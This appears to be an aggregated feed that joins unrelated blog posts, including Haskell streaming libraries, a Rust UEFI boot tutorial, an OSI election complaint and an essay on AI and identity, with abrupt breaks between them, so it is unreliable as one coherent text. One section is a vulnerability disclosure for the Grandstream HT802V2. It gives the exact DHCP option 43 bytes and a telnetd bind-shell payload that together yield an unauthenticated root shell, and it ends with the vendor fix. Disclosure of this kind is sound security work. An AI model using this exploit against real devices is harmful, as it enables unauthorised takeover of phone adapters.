Author: Mark Renney For Tanner, each name as it appeared on his list was merely a statistic, albeit one it was his job to render obsolete. He was all too aware that there were levels and some of them had sunk deeper into the quagmire than others. But he had always believed it was important […]
Abstract: The wide adoption of deep neural networks (DNNs) raises the question of how we can equip them with a desired cryptographic functionality (e.g., to decrypt an encrypted input, to verify that this input is authorized, or to hide a secure watermark in the output). The problem is that cryptographic primitives are typically designed to run on digital computers that use Boolean gates to map sequences of bits to sequences of bits, whereas DNNs are a special type of analog computer that uses linear mappings and ReLUs to map vectors of real numbers to vectors of real numbers. This discrepancy between the discrete and continuous computational models raises the question of what is the best way to implement standard cryptographic primitives as DNNs, and whether DNN implementations of secure cryptosystems remain secure in the new setting, in which an attacker can ask the DNN to process a message whose “bits” are arbitrary real numbers.
In this paper we lay the foundations of this new theory, defining the meaning of correctness and security for implementations of cryptographic primitives as ReLU-based DNNs. We then show that the natural implementations of block ciphers as DNNs can be broken in linear time by using such nonstandard inputs. We tested our attack in the case of full round AES-128, and it succeeded in finding randomly chosen keys. Finally, we develop a new method for implementing any desired cryptographic functionality as a standard ReLU-based DNN in a provably secure and correct way. Our protective technique has very low overhead (a constant number of additional layers and a linear number of additional neurons), and is completely practical.
First, let's briefly discuss and define streaming in this context.
Structure and Interpretation of Computer Programs introduces Streams
as an analogue of lists, to support delayed evaluation. In brief, the
inductive list type (a list is either an empty list or a head element
pre-pended to another list) is replaced with a structure with a head
element and a promise which, when evaluated, will generate the tail
(which in turn may have a head element and a promise to generate another
tail, culminating in the equivalent of an empty list.) Later on SICP
also covers lazy evaluation.
However, the streaming we're talking about originates in the relational
community, rather than the functional one, and is subtly different. It's
about building a pipeline of processing that receives and emits data but
doesn't need to (indeed, cannot) reference the whole stream (which may
be infinite) at once.
Conduit is the oldest of the ones I am reviewing here, but I doubt it's
the first in the Haskell ecosystem. If I've made any obvious omissions,
please let me know!
Conduit provides a new set of types to model streaming data, and a completely
new set of functions which are analogues of standard Prelude functions, e.g.
sumC in place of sum. It provides its own combinator(s) such as .| (aka fuse),
which is like composition but reads left-to-right.
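To give a flavour of the API, here is a minimal sketch of a Conduit pipeline (my own toy example, not taken from the Conduit docs):

import Conduit

-- Sum the squares of the first million Ints, in constant memory.
main :: IO ()
main = print $ runConduitPure $ yieldMany [1 .. 1000000 :: Int] .| mapC (^ 2) .| sumC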
The motivation for this is to enable (near?) constant memory usage for
processing large streams of data -- presumably versus using a list-based
approach -- and to provide some determinism: the README gives the example of
"promptly closing file handles". I think this is another way of saying
that it uses strict evaluation, or at least avoids lazy evaluation for
some things.
Conduit offers interleaved effects: which is to say, IO can be performed
mid-stream.
Conduit supports distributed operation via Data.Conduit.Network in the
conduit-extra package. Michael Snoyman, principal Conduit author, wrote
up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async
To write a distributed Conduit application, the application programmer must
manually determine the boundaries between the clients/servers and write specific
code to connect them.
The Pipes
Tutorial
contrasts itself with "Conventional Haskell stream programming": whether that
means Conduit or something else, I don't know.
Paraphrasing their pitch: Effects, Streaming, Composability: pick two. That's
the situation they describe for stream programming prior to Pipes. They argue
Pipes offers all three.
Pipes offers its own combinators (which read left-to-right)
and supports interleaved effects.
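As a minimal sketch of what that looks like (my own toy example, not from the tutorial):

import Data.Char (toUpper)
import Pipes
import qualified Pipes.Prelude as P

-- Upper-case stdin to stdout; the IO effects are interleaved as the stream flows.
main :: IO ()
main = runEffect $ P.stdinLn >-> P.map (map toUpper) >-> P.stdoutLn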
At this point I can't really see what fundamentally distinguishes Pipes from
Conduit.
Pipes has some support for distributed operation via the sister library
pipes-network. It
looks like you must send and receive ByteStrings, which means rolling
your own serialisation for other types. As with Conduit, to send or receive
over a network, the application programmer must divide their program up
into the sub-programs for each node, and add the necessary ingress/egress
code.
io-streams emphasises simple primitives. Reading and writing is done
under the IO Monad, thus in an effectful (but non-pure) context. The
presence or absence of further stream data is signalled using the
Maybe type (Just more data, or Nothing: the producer has finished).
It provides a library of functions that shadow the standard Prelude, such
as S.fromList, S.mapM, etc.
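A tiny sketch of that style (my own example):

import qualified System.IO.Streams as S

-- Build an InputStream from a list, then pull from it until it is exhausted.
main :: IO ()
main = do
    is <- S.fromList [1, 2, 3 :: Int]
    S.read is >>= print    -- Just 1
    S.toList is >>= print  -- [2,3]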
It's not clear to me what the motivation for io-streams is, beyond
providing a simple interface. There's no declaration of intent that I can find
about (e.g.) constant-memory operation.
There's no mention of or support (that I can find) for distributed
operation.
Similar to io-streams, Streaming emphasises providing a simple
interface that gels well with traditional Haskell methods. Streaming
provides effectful streams (via a Monad -- any Monad?) and a collection
of functions for manipulating streams which are designed to closely
mimic standard Prelude (and Data.List) functions.
Streaming doesn't push its own combinators: the examples provided
use $ and read right-to-left.
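For example, a small sketch using Streaming.Prelude (my own example):

import qualified Streaming.Prelude as S

-- Stream a million Ints through a map and a fold without ever building a list.
main :: IO ()
main = print =<< S.sum_ (S.map (* 2) $ S.each [1 .. 1000000 :: Int])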
The motivation for Streaming seems to be to avoid memory leaks caused by
extracting pure lists from IO with traditional functions like mapM,
which require all the list constructors to be evaluated, the list to be
completely deconstructed, and then a new list constructed.
Like io-streams, the focus of the library is providing a low-level
streaming abstraction, and there is no support for distributed operation.
Streamly appears to have the grand goal of providing a unified programming
tool, as suited to quick-and-dirty programming tasks (normally the domain of
scripting languages) as to high-performance work (C, Java, Rust, etc.). Their
intended audience appears to be everyone, or at least not just existing
Haskell programmers. See their rationale.
Streamly offers an interface to permit composing concurrent (note: not
distributed) programs via combinators. It relies upon fusing a streaming
pipeline to remove intermediate list structure allocations and de-allocations
(i.e. deforestation, similar to GHC rewrite rules).
The examples I've seen use standard combinators (e.g. Data.Function.&,
which reads left-to-right, and Applicative).
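A small sketch of that style (my own example, written against the streamly-0.8-era Streamly.Prelude API; later releases reorganised the modules):

import Data.Function ((&))
import qualified Streamly.Prelude as S

-- Pipe a stream through a map and a fold, reading left to right via (&).
main :: IO ()
main = S.fromList [1 .. 1000000 :: Int] & S.map (* 2) & S.sum >>= print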
Streamly provides benchmarks
versus Haskell pure lists, Streaming, Pipes and Conduit: these generally
show Streamly as several orders of magnitude faster.
I'm finding it hard to evaluate Streamly. It's big, and its focus is wide.
It provides shadows of Prelude functions, as many of these libraries do.
wrap-up
It seems almost like it must be a rite-of-passage to write a streaming system
in Haskell. Stones and glass houses, I'm guilty of that
too.
The focus of the surveyed libraries is mostly on providing a streaming
abstraction, normally with an analogous interface to standard Haskell lists.
They differ on various philosophical points (whether to abstract away the
mechanics behind type synonyms, how much to leverage existing Haskell idioms,
etc). A few of the libraries have some rudimentary support for distributed
operation, but this is limited to connecting separate nodes together: in some
cases serialising data remains the application programmer's job, and in all
cases the application programmer must manually carve up their processing
according to a fixed idea of what nodes they are deploying to. They all
define a fixed-function pipeline.
The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats.
In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.
Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February.
I was dismayed when I received the following mail from Nick Vidal:
Dear Luke,
Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.
We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.
The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.
Accordingly, I was not able to participate in the "potential board director" info sessions, but people who attended report that the importance of accommodating differing time zones was discussed during the info session, and that OSI representatives mentioned they try to accommodate everyone's time zones. This seems in sharp contrast with the above policy.
I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle.
We like trains here at Error'd, and you all seem to like trains
too. That must be the main reason we get so many submissions about broken
information systems.
"Pass," said
Jozsef
. I think that train might have crashed already.
An anonymous subscriber shared an epic tale some time ago. They explained thus.
"(I couldn't capture in the photo, but the next station after Duivendrecht was showing the time of 09:24+1.)
We know Europe has pretty good trains, and even some high-speed
lines. But this was the first time I boarded a time-traveling train.
At first I was annoyed to be 47 minutes late. I thought I could easily walk
from Amsterdam Centraal to Muiderpoort in less than the 53 minutes that
this train would take. But I was relieved to know the trip to the further
stations was going to be quicker, and I would arrive there even before
arriving at the earlier stations."
I think the explanation here is that this train is currently expected
to arrive at Muiderpoort around 10:01. But it's still projected to
arrive at the following stop at 9:46, and more surprisingly at the
successive stops at 9:35 and 9:25.
Railfan Richard B. recently shared
"Points failure on the West Coast Main Line has disrupted the linear nature of time."
and quite some time ago, he also sent us this snap, singing
"That train that's bound for glory? It runs through here."
An unrelated David B. wonders
"When is the next train? We don't know, it's running incognito."
And finally, courageous Ivan got sideways underground.
"Copenhagen subway system may have fully automated trains,
but their informational screens need a little manual help every now and then."
Author: David Barber Mr Wells having already written a popular scientific romance about time travel, publishers seemed to think my own literary efforts on the subject suffered by comparison. They also warned my title would be a hindrance to commercial success. One editor commented that making the protagonist a woman was even less believable than […]
Yesterday I released a new version of
virtnbdbackup with a nice
improvement.
The new version can now detect zeroed regions in the bitmaps by comparing the
block regions against the state within the base bitmap during incremental
backup.
This is helpful if virtual machines run fstrim, as it results in a smaller backup
footprint. Before, the incremental backups could grow by the same amount as the
fstrimmed data regions.
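For context, a typical full-plus-incremental cycle looks roughly like this (my sketch of the CLI; check virtnbdbackup --help for the exact flags of your version):

virtnbdbackup -d vm1 -l full -o /backup/vm1   # initial full backup
virtnbdbackup -d vm1 -l inc -o /backup/vm1    # incremental, now skipping fstrimmed regions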
I also managed to enhance the tests by using the Arch Linux cloud images. The
automated GitHub CI tests now actually test backup and restores against a
virtual machine running a real OS.
As of today, Rcpp stands at 3001
reverse-dependencies on CRAN.
The graph on the left depicts the growth of Rcpp usage (as measured by Depends,
Imports and LinkingTo, but excluding Suggests) over time.
Rcpp was first released in November 2008. It took seven years to
clear 500 packages in late October 2015, after which usage of R and Rcpp
accelerated: 1000 packages in April 2017, 1500 packages in November 2018,
2000 packages in July 2020, and 2500 packages in February 2022.
The chart extends to the very beginning
via manually compiled data from CRANberries and
checked with crandb.
The core part of the data set is generated semi-automatically when
updating a (manually curated) list of packages using Rcpp that is available
too.
The Rcpp team aims to keep Rcpp as
performant and reliable as it has been (see e.g. here for more
details). Last month’s 1.0.14
release post is a good example of the ongoing work. A really big
shoutout and Thank You! to all users and contributors
of Rcpp for help, suggestions, bug
reports, documentation or, of course, code.
I can’t remember exactly the joke I was making at the time in my
work’s slack instance (I’m sure it wasn’t particularly
funny, though; and not even worth re-reading the thread to work out), but it
wound up with me writing a UEFI binary for the punchline. Not to spoil the
ending but it worked - no pesky kernel, no messing around with “userland”. I
guess the only part of this you really need to know for the setup here is that
it was a Severance joke,
which is some fantastic TV. If you haven’t seen it, this post will seem perhaps
weirder than it actually is. I promise I haven’t joined any new cults. For
those who have seen it, the payoff to my joke is that I wanted my machine to
boot directly to an image of
Kier Eagan.
As for how to do it – I figured I’d give the uefi
crate a shot, and see how it is to use,
since this is a low stakes way of trying it out. In general, this isn’t the
sort of thing I’d usually post about – except this wound up being easier and
way cleaner than I thought it would be. That alone is worth sharing, in the
hopes someone comes across this in the future and feels like they, too, can
write something fun targeting the UEFI.
First thing’s first – gotta create a rust project (I’ll leave that part to you
depending on your life choices), and to add the uefi crate to your
Cargo.toml. You can either use cargo add or add a line like this by hand:
uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }
We also need to teach cargo about how to go about building for the UEFI target,
so we need to create a rust-toolchain.toml with one (or both) of the UEFI
targets we’re interested in:
Unfortunately, I wasn’t able to use the
image crate,
since it won’t build against the uefi target. This looks like it’s
because rustc had no way to compile the required floating point operations
within the image crate without hardware floating point instructions
specifically. Rust tends to punt a lot of that to libm usually, so this isnt
entirely shocking given we’re nostd for a non-hardfloat target.
So-called “softening” requires a software floating point implementation that
the compiler can use to “polyfill” (feels weird to use the term polyfill here,
but I guess it’s spiritually right?) the lack of hardware floating point
operations, which rust hasn’t implemented for this target yet. As a result, I
changed tactics, and figured I’d use ImageMagick to pre-compute the pixels
from a jpg, rather than doing it at runtime. A bit of a bummer, since I need
to do more out of band pre-processing and hardcoding, and updating the image
kinda sucks as a result – but it’s entirely manageable.
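A pair of ImageMagick commands along these lines does the job (a sketch; the 1280x720 geometry and the kier.full.rgba filename are my choices, adjust to your display):

$ convert kier.jpg -resize 1280x720 kier.full.jpg
$ convert kier.full.jpg -depth 8 kier.full.rgba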
This will take our input file (kier.jpg), resize it to get as close to the
desired resolution as possible while maintaining aspect ratio, then convert it
from a jpg to a flat array of 4 byte RGBA pixels. Critically, it’s also
important to remember that the size of the kier.full.jpg file may not actually
be the requested size – it will not change the aspect ratio, so be sure to
make a careful note of the resulting size of the kier.full.jpg file.
Last step with the image is to compile it into our Rust binary, since we
don’t want to struggle with trying to read this off disk, which is thankfully
real easy to do.
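Something like the following is enough (a sketch; the constant values here are placeholders, so fill in the real dimensions of your kier.full.jpg):

// Placeholder dimensions; substitute the real size of your kier.full.jpg.
const KIER: &[u8] = include_bytes!("../kier.full.rgba");
const KIER_WIDTH: usize = 1280;
const KIER_HEIGHT: usize = 641;
const KIER_PIXEL_SIZE: usize = 4;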
Remember to use the width and height from the final kier.full.jpg file as the
values for KIER_WIDTH and KIER_HEIGHT. KIER_PIXEL_SIZE is 4, since we
have 4 byte wide values for each pixel as a result of our conversion step into
RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop
that down to 3. I don’t entirely know why I kept alpha around, but I figured it
was fine. My kier.full.jpg image winds up shorter than the requested height
(which is also qemu’s default resolution for me) – which means we’ll get a
semi-annoying black band under the image when we go to run it – but it’ll
work.
Anyway, now that we have our image as bytes, we can get down to work, and
write the rest of the code to handle moving bytes around from in-memory
as a flat block of pixels, and request that they be displayed using the
UEFI GOP. We’ll just need to hack up a container
for the image pixels and teach it how to blit to the display.
/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
struct RgbImage {
    /// Size of the image as a tuple, as the
    /// (width, height)
    size: (usize, usize),
    /// raw pixels we'll send to the display.
    inner: Vec<BltPixel>,
}

impl RgbImage {
    /// Create a new `RgbImage`.
    fn new(width: usize, height: usize) -> Self {
        RgbImage {
            size: (width, height),
            inner: vec![BltPixel::new(0, 0, 0); width * height],
        }
    }

    /// Take our pixels and request that the UEFI GOP
    /// display them for us.
    fn write(&self, gop: &mut GraphicsOutput) -> Result {
        gop.blt(BltOp::BufferToVideo {
            buffer: &self.inner,
            src: BltRegion::Full,
            dest: (0, 0),
            dims: self.size,
        })
    }
}

impl Index<(usize, usize)> for RgbImage {
    type Output = BltPixel;

    fn index(&self, idx: (usize, usize)) -> &BltPixel {
        let (x, y) = idx;
        &self.inner[y * self.size.0 + x]
    }
}

impl IndexMut<(usize, usize)> for RgbImage {
    fn index_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
        let (x, y) = idx;
        &mut self.inner[y * self.size.0 + x]
    }
}
We also need to do some basic setup to get a handle to the UEFI
GOP via the UEFI crate (using
uefi::boot::get_handle_for_protocol
and
uefi::boot::open_protocol_exclusive
for the GraphicsOutput
protocol), so that we have the object we need to pass to RgbImage in order
for it to write the pixels to the display. The only trick here is that the
display on the booted system can really be any resolution – so we need to do
some capping to ensure that we don’t write more pixels than the display can
handle. Writing fewer than the display’s maximum seems fine, though.
fn praise() -> Result {
    let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
    let mut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;

    // Get the (width, height) that is the minimum of
    // our image and the display we're using.
    let (width, height) = gop.current_mode_info().resolution();
    let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));

    let mut buffer = RgbImage::new(width, height);
    for y in 0..height {
        for x in 0..width {
            let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
            let pixel = &mut buffer[(x, y)];
            pixel.red = KIER[idx_r];
            pixel.green = KIER[idx_r + 1];
            pixel.blue = KIER[idx_r + 2];
        }
    }
    buffer.write(&mut gop)?;
    Ok(())
}
Not so bad! A bit tedious – we could solve some of this by turning
KIER into an RgbImage at compile-time using some clever Cow and
const tricks and implement blitting a sub-image of the image – but this
will do for now. This is a joke, after all, let’s not go nuts. All that’s
left with our code is for us to write our main function and try and boot
the thing!
#[entry]
fn main() -> Status {
    uefi::helpers::init().unwrap();
    praise().unwrap();
    boot::stall(100_000_000);
    Status::SUCCESS
}
If you’re following along at home and so interested, the final source is over at
gist.github.com.
We can go ahead and build it using cargo (as is our tradition) by targeting
the UEFI platform.
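Assuming the x86_64 target from the toolchain file, that's a one-liner (sketch):

$ cargo build --release --target x86_64-unknown-uefi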
While I can definitely get my machine to boot these blobs to test, I figured
I’d save myself some time by using QEMU to test without a full boot.
If you’ve not done this sort of thing before, we’ll need two packages,
qemu and ovmf. It’s a bit different than most invocations of qemu you
may see out there – so I figured it’d be worth writing this down, too.
$ doas apt install qemu-system-x86 ovmf
qemu has a nice feature where it’ll create us an EFI partition as a drive and
attach it to the VM off a local directory – so let’s construct an EFI
partition file structure, and drop our binary into the conventional location.
If you haven’t done this before, and are only interested in running this in a
VM, don’t worry too much about it, a lot of it is convention and this layout
should work for you.
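Roughly like so (a sketch; I'm assuming the crate is called boot2kier, so cargo's output is boot2kier.efi):

$ mkdir -p esp/efi/boot
$ cp target/x86_64-unknown-uefi/release/boot2kier.efi esp/efi/boot/bootx64.efi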
With all this in place, we can kick off qemu, booting it in UEFI mode using
the ovmf firmware, attaching our EFI partition directory as a drive to
our VM to boot off of.
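An invocation along these lines does it (a sketch; the OVMF path shown is where Debian's ovmf package puts it and may differ on your distro):

$ qemu-system-x86_64 \
    -bios /usr/share/ovmf/OVMF.fd \
    -drive format=raw,file=fat:rw:esp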
If all goes well, soon you’ll be met with the all knowing gaze of
Chosen One, Kier Eagan. The thing that really impressed me about all
this is that the program worked on the first try – it all went so boringly
normal. Truly, kudos to the uefi crate maintainers, it’s incredibly
well done.
Booting a live system
Sure, we could stop here, but anyone can open up an app window and see a
picture of Kier Eagan, so I knew I needed to finish the job and boot a real
machine up with this. In order to do that, we need to format a USB stick.
BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives
are NVMe, so BE CAREFUL – if you use SATA, it may very well be your
hard drive! Please do not destroy your computer over this.
$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Once that looks good (depending on your flavor of udev you may or
may not need to unplug and replug your USB stick), we can go ahead
and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR
USB STICK) and write our EFI directory to it.
$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi
Of course, naturally, devotion to Kier shouldn’t mean backdooring your system.
Disabling Secure Boot runs counter to the Core Principles, such as Probity, and
not doing this would surely run counter to Verve, Wit and Vision. This bit does
require that you’ve taken the step to enroll a
MOK and know how
to use it; right about now is when we can use sbsign to sign the UEFI binary
we want to boot from while continuing to enforce Secure Boot. The details of how
this command should be run are likely something you'll need to work
out depending on how you've decided to manage your MOK.
I figured I’d leave a signed copy of boot2kier at
/boot/efi/EFI/BOOT/KIER.efi on my Dell XPS 13, with Secure Boot enabled
and enforcing, just took a matter of going into my BIOS to add the right
boot option, which was no sweat. I’m sure there is a way to do it using
efibootmgr, but I wasn’t smart enough to do that quickly. I let ‘er rip,
and it booted up and worked great!
It was a bit hard to get a video of my laptop, though – but lucky for me, I
have a Minisforum Z83-F sitting around (which, until a few weeks ago was running
the annual http server to control my christmas tree
) – so I grabbed it out of the christmas bin, wired it up to a video capture
card I have sitting around, and figured I’d grab a video of me booting a
physical device off the boot2kier USB stick.
Attentive readers will notice the image of Kier is smaller than the qemu booted
system – which just means our real machine has a larger GOP display
resolution than qemu, which makes sense! We could write some fancy resize code
(sounds annoying), center the image (can’t be assed but should be the easy way
out here) or resize the original image (pretty hardware specific workaround).
Additionally, you can make out the image being written to the display before us
(the Minisforum logo) behind Kier, which is really cool stuff. If we were real
fancy we could write blank pixels to the display before blitting Kier, but,
again, I don’t think I care to do that much work.
But now I must away
If I wanted to keep this joke going, I’d likely try and find a copy of the
original
video when Helly 100%s her file
and boot into that – or maybe play a terrible midi PC speaker rendition of
Kier, Chosen One, Kier after
rendering the image. I, unfortunately, don’t have any friends involved with
production (yet?), so I reckon all that’s out for now. I’ll likely stop playing
with this – the joke was done and I’m only writing this post because of how
great everything was along the way.
All in all, this reminds me so much of building a homebrew kernel to boot a
system into – but like, good, though, and it’s a nice reminder of both how
fun this stuff can be, and how far we’ve come. UEFI protocols are light-years
better than how we did it in the dark ages, and the tooling for this is SO
much more mature. Booting a custom UEFI binary is miles ahead of trying to
boot your own kernel, and I can’t believe how good the uefi crate is
specifically.
Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.
The Grandstream HT802V2 uses busybox' udhcpc for DHCP.
When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data.
On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
According to the documentation the format is <option_code><value_length><value>.
The only documented option code is 0x01 for the ACS URL.
However, if you pass other codes, these are accepted and parsed too.
In particular, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh.
What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080

cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    corefile_dec ${TEST_SCRIPT}
    if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget.
We could probably construct a gs_test_server value in a way that makes wget overwrite some system file, as was suggested in CVE-2021-37915.
But we also can just let the script download the file and execute it for us.
The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed.
I have no idea how the encryption works.
But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things!
The result gets correctly decrypted by corefile_dec back to the needed payload.
That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes
telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile and place it on a webserver as vendor_test.sh.
The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port.
This means the value of DHCP option 43 needs to be 05, then 0e (14, the length of the IP address string), followed by the ASCII bytes of 192.168.42.222.
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't).
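If your test DHCP server happens to be dnsmasq (an assumption on my part; any server that can hand out raw option 43 bytes will do), that's a one-liner in dnsmasq.conf:

dhcp-option=43,05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32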
And boom, root shell on port 1270 :)
As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable.
Both of these variables were controllable using the existing gs_config interface after authentication.
But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)
Affected devices
HT802V2 running 1.0.3.5 (and any other release older than 1.0.3.10), as that's what I have tested
Most probably also other HT8xxV2, as they use the same firmware
Most probably also HT8xx(V1), as their /usr/share/udhcpc/default.script and /app/bin/vendor_test_suite.sh look very similar, according to firmware dumps
Fix
After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"

cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
    if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x ${VENDOR_SCRIPT}
        ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.
The goal of this code is simply to do something for every day within a range of dates. These two approaches vary a bit in terms of readability though.
The loop in the functional version isn't mutating anything, I suppose. But honestly, I'm surprised that this didn't take the extra step of using the .ForEach function (which takes a lambda and applies it to each element). Heck, with that approach, they could have done this whole thing in a single statement.
Author: Daniel Rogers I’m to be sacrificed tomorrow. I knew I wasn’t going to like this planet, but when your fighter decides to crash, it doesn’t ask how you feel about it. Gline-doth is a class C Primitive. I’m a little rusty on my planet classifications, but I believe it means they use rudimentary tools […]
JOIN US IN PERSON AND ONLINE for K Allado-McDowell's Long Now Talk, On Neural Media, on February 25, 02025 at 7 PM PT at the Cowell Theater in San Francisco.
Neural Media
Over the last decade, I’ve watched AI challenge — and augment — humanity in astonishing ways. Every few years, a new innovation seems to raise the same questions: can we compute human intelligence? Can our labor be automated? Who owns these systems and their training data? How will this technology reshape society? Yet there is one question I rarely hear asked: how will AI change our understanding of ourselves?
All media influence our sense of identity. In a previous essay, I examined how older media types altered subjectivity, in deliberate and unforeseen ways, and developed an evolutionary framework of media types. It begins with broadcast media (such as radio and television), which were molded into immersive media (from museum exhibitions and laser shows to Burning Man and VR), and later network media (from home computing to social media, short-form video, and memes). AI appears last, in a new category I called “neural media,” which also includes any medium that incorporates neural structures, such as brain-computer interfaces.
Each media type structures identity differently. Broadcast media produce demographic identities. Immersive media produce democratic or self-constructed identities. Network media produce fractal identities. And neural media produce embedded identities.
The purpose of this framework was to compare and contrast historical media types through the space, content, and identity they produce. I described an increasing fractalization of identity made possible by more complex and recursive methods of audience sensing. The demographic blocks that describe television viewers (age, gender, race, location) are crude compared to the AI embeddings that adtech systems use to describe today’s web users. Online political identity now has many facets and variations that do not easily map to a 20th century two-party system or left-right spectrum.
In the words of Marshall McLuhan, “The content of any medium is always another medium.” In my framework, media types mature — and consume their predecessors — in 30-year phases. In the early 02010s, we began to feel the effects of the mature network media form, just as neural media appeared.
We are now, in 02025, 15 years into neural media, halfway through its maturation cycle. That is to say, neural media are still relatively malleable. Given that they will have profound effects on every aspect of culture and subjectivity, it’s imperative that we address them as a psychosocial force, before their structures become fixed. How we do this will determine neural media’s influence on 21st century identity.
Embedded Identity
Media shape identity and subjectivity through feedback loops. Twentieth century broadcasters, in pursuit of accurate advertising targets, used devices like the Audimeter to measure viewer demographics. This information allowed broadcasters to produce content that appealed to, and shaped, specific groups of viewers. In a media environment built with AI, human users are perceived and reflected not through demography but through statistical distributions. In the same way that programmed television shows reinforced demographic aspects of identity, neural media reinforce identities as they are perceived by machines, that is, as locations (or embeddings1) in a statistical landscape.
Every interaction we have with AI involves being seen, interpreted, and reflected through this hidden landscape or latent space. For example, imagine a credit system that uses AI to assign scores to borrowers. This reduces a complex data set (my credit history) to a single number, which can drastically alter my ability to rent or buy a home. Similarly, my driving behavior, as measured by computers in modern automobiles, is ingested by machine learning in order to predict accidents and determine my insurance rate. Social media algorithms control what I see in my feed, and how my personal profile is exposed, with downstream effects on my social life, politics, and employment.
Many dimensions of daily life today are determined by one’s position in an AI model’s latent space. These perceptions have material consequences that inevitably influence my sense of self, even if I disagree with them. In a world increasingly run by AI, we navigate both physical and latent space simultaneously. So it’s increasingly important that we understand what it means to identify as an embedding in a statistical model.
Being Statistical
One need not look far for examples of embedded and statistical self-identification in culture today. Dating app users describe themselves in terms of percentiles and distributions. ("I'm in the top 20% for height.") Social media platforms provide statistical metrics for one's online profile. ("My engagement rate is in the top 10%.") Personality systems, like the MBTI, Big Five, or Kegan scale — not to mention popular astrology and derivatives like Human Design — encourage people to discuss their own traits within statistical distributions. ("INTJs make up about 2% of the population, while Manifestors make up 9%.") Fitness tracking via biomarkers and wearable devices provides a statistical frame for both physical and social identity, and new psychological theories describe states of mind in topological terms.
